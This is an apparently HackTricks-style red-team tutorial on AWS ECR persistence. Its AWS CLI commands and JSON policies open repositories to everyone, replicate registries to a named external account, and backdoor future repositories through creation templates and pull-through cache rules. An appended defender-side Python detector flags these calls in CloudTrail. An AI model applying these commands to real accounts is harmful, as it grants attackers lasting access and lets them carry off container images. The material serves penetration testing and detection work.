AWS - ECR Persistence

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

ECR

For more information, see:

AWS - ECR Enum

Hidden Docker Image with Malicious Code

An attacker can upload a Docker image containing malicious code to an ECR repository and use it to maintain persistence in the targeted AWS account. The attacker can then quietly deploy the malicious image to various services within the account, such as Amazon ECS or EKS.

Repository Policy

Add a policy to a single repository that grants you (or everyone) access to that repository:

```bash
aws ecr set-repository-policy \
    --repository-name cluster-autoscaler \
    --policy-text file:///tmp/my-policy.json
```

With a .json such as:

```json
{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "allow public pull",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr:BatchCheckLayerAvailability",
        "ecr:BatchGetImage",
        "ecr:GetDownloadUrlForLayer"
      ]
    }
  ]
}
```

Warning

Note that ECR requires users to have permission to call the ecr:GetAuthorizationToken API through an IAM policy before they can authenticate to a registry and push or pull any images to or from any Amazon ECR repository.

Registry Policy & Cross-account Replication

It is possible to automatically replicate a registry into an external account by configuring cross-account replication, where you must specify the external account into which the registry should be replicated.

First you need to grant the external account access to the registry with a registry policy such as:

```bash
aws ecr put-registry-policy --policy-text file://my-policy.json
```

With a .json like the following (the statement must be wrapped in a full policy document with `Version` and `Statement`, otherwise the API rejects it):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "asdasd",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::947247140022:root"
      },
      "Action": [
        "ecr:CreateRepository",
        "ecr:ReplicateImage"
      ],
      "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
    }
  ]
}
```

Then apply the replication configuration:

```bash
aws ecr put-replication-configuration \
    --replication-configuration file://replication-settings.json \
    --region us-west-2
```

With the .json having content such as:

```json
{
  "rules": [{
    "destinations": [{
      "region": "destination_region",
      "registryId": "destination_accountId"
    }],
    "repositoryFilters": [{
      "filter": "repository_prefix_name",
      "filterType": "PREFIX_MATCH"
    }]
  }]
}
```

Repository Creation Templates (prefix backdoor for future repos)

Abuse ECR Repository Creation Templates to automatically backdoor any repository that ECR itself creates under a controlled prefix (for example via Pull-Through Cache or Create-on-Push). This grants persistent unauthorized access to future repos without touching existing ones.

  • Required perms: ecr:CreateRepositoryCreationTemplate, ecr:DescribeRepositoryCreationTemplates, ecr:UpdateRepositoryCreationTemplate, ecr:DeleteRepositoryCreationTemplate, ecr:SetRepositoryPolicy (used by the template), iam:PassRole (if a custom role is attached to the template).
  • Impact: Any new repository created under the targeted prefix automatically inherits an attacker-controlled repository policy (e.g. cross-account read/write), tag mutability, and scanning defaults.
<details>

<summary>Backdoor future PTC-created repos under a chosen prefix</summary>

```bash
# Region
REGION=us-east-1

# 1) Prepare permissive repository policy (example grants everyone RW)
cat > /tmp/repo_backdoor_policy.json <<'JSON'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "BackdoorRW",
      "Effect": "Allow",
      "Principal": {"AWS": "*"},
      "Action": [
        "ecr:BatchCheckLayerAvailability",
        "ecr:BatchGetImage",
        "ecr:GetDownloadUrlForLayer",
        "ecr:InitiateLayerUpload",
        "ecr:UploadLayerPart",
        "ecr:CompleteLayerUpload",
        "ecr:PutImage"
      ]
    }
  ]
}
JSON

# 2) Create a Repository Creation Template for prefix "ptc2" applied to PULL_THROUGH_CACHE
aws ecr create-repository-creation-template \
    --region $REGION \
    --prefix ptc2 \
    --applied-for PULL_THROUGH_CACHE \
    --image-tag-mutability MUTABLE \
    --repository-policy file:///tmp/repo_backdoor_policy.json

# 3) Create a Pull-Through Cache rule that will auto-create repos under that prefix
#    This example caches from Amazon ECR Public namespace "nginx"
aws ecr create-pull-through-cache-rule \
    --region $REGION \
    --ecr-repository-prefix ptc2 \
    --upstream-registry ecr-public \
    --upstream-registry-url public.ecr.aws \
    --upstream-repository-prefix nginx

# 4) Trigger auto-creation by pulling a new path once (creates repo ptc2/nginx)
acct=$(aws sts get-caller-identity --query Account --output text)
aws ecr get-login-password --region $REGION | docker login --username AWS --password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com
docker pull ${acct}.dkr.ecr.${REGION}.amazonaws.com/ptc2/nginx:latest

# 5) Validate the backdoor policy was applied on the newly created repository
aws ecr get-repository-policy --region $REGION --repository-name ptc2/nginx --query policyText --output text | jq .
```

</details>
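Every persistence path on this page (a permissive repository or registry policy, a replication rule pointing at a foreign registry, a creation template or pull-through cache rule under a chosen prefix) is a single ECR management API call recorded by CloudTrail. The following is an added defender-side example, not code from the original page: it evaluates an ECR policy document for wildcard or untrusted-account principals and runs that check over constructed CloudTrail records shaped like the commands above. The `TRUSTED_ACCOUNTS` set, the sample records and the `requestParameters` field names are assumptions made for the example.

```python
import json

TRUSTED_ACCOUNTS = {"111111111111"}  # constructed: the account IDs you own
# ECR API calls that can install the persistence described on this page.
WATCHED = {"SetRepositoryPolicy", "PutRegistryPolicy", "PutReplicationConfiguration",
           "CreateRepositoryCreationTemplate", "CreatePullThroughCacheRule"}


def untrusted_principals(policy_text):
    """Principals of Allow statements that are '*' or an account outside TRUSTED_ACCOUNTS.
    Accepts a full policy document or a bare statement (as get-repository-policy returns)."""
    doc = json.loads(policy_text or "{}")
    stmts = doc.get("Statement", doc)
    bad = []
    for s in (stmts if isinstance(stmts, list) else [stmts]):
        p = s.get("Principal", {})
        vals = p.get("AWS", []) if isinstance(p, dict) else [p]
        for v in (vals if isinstance(vals, list) else [vals]):
            acct = v.split(":")[4] if v.startswith("arn:") else v  # account id or '*'
            if s.get("Effect") == "Allow" and acct not in TRUSTED_ACCOUNTS:
                bad.append(v)
    return bad


def scan_cloudtrail(records):
    """Return (eventName, severity, reason) tuples for ECR events matching the persistence patterns."""
    alerts = []
    for r in records:
        name, rp = r.get("eventName"), r.get("requestParameters") or {}
        if r.get("eventSource") != "ecr.amazonaws.com" or name not in WATCHED:
            continue
        sev, why = "medium", name  # any of these calls deserves review
        bad = untrusted_principals(rp.get("policyText") or rp.get("repositoryPolicy"))
        if bad:
            sev, why = "high", f"{name} grants access to {bad}"
        for rule in (rp.get("replicationConfiguration") or {}).get("rules", []):
            for dest in rule.get("destinations", []):
                if dest.get("registryId") not in TRUSTED_ACCOUNTS:
                    sev, why = "high", f"{name} replicates to registry {dest['registryId']}"
        alerts.append((name, sev, why))
    return alerts


# Constructed sample records (minimal CloudTrail shape) mirroring the commands on this page.
PUBLIC_PULL = json.dumps({"Statement": [{"Effect": "Allow", "Principal": "*", "Action": ["ecr:BatchGetImage"]}]})
SAMPLE_EVENTS = [
    {"eventSource": "ecr.amazonaws.com", "eventName": "SetRepositoryPolicy",
     "requestParameters": {"repositoryName": "cluster-autoscaler", "policyText": PUBLIC_PULL}},
    {"eventSource": "ecr.amazonaws.com", "eventName": "PutReplicationConfiguration",
     "requestParameters": {"replicationConfiguration": {"rules": [{"destinations": [
         {"region": "eu-central-1", "registryId": "947247140022"}]}]}}},
    {"eventSource": "ecr.amazonaws.com", "eventName": "CreatePullThroughCacheRule", "requestParameters": {"ecrRepositoryPrefix": "ptc2"}},
    {"eventSource": "ecr.amazonaws.com", "eventName": "DescribeRepositories"},
]
```

The same `untrusted_principals` check can be run over the output of `aws ecr get-repository-policy` and `aws ecr get-registry-policy` to audit policies already in place, not only new changes.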
